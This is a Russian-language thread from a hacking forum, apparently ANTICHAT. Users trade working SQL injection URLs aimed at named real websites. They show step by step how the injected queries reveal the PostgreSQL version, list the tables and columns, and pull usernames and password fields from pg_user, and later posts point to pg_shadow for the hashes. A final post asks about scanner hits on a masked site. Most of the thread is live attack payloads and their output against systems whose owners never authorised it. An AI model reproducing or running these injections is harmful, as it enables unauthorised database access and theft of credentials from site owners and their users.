ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.sports.kz/index.php?st=-1'

как юзать? что то ничего там не катит толи фильтры толи хз даже пробел затолкать не могу

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--

PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--

выводит много интересного, но я выбрал pg_user

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--

результат:

usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--


первый это админ
login: postgres
pass: ********

Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....

может пасс ********?

Нет, там у всех так пасс выглядит, а когда я запрос составил чтоб пароль в др ячейку копировать то база сказала что не может копировать поле hide в text
т.е. пароли имеют тип hide

2 truelamer
Ты просто неудачную таблицу выбрал. В ней нет паролей ,что-то типа файла passwd в unix
Если точнее, то системная таблица с информацией о юзерах
P.S но версия Piflit мне тоже понравилась

это тебе надо в pg_shadow лезть, но не факт что прав хватит

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

А точнее-факт ,что не хватит. Там куча других данных и возможностей,смотря какая цель

Цельбыла одна: научиться.

Всем спасибо, всем плюсую.

Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info

перехожу по этим ссылкам ни чего не происходит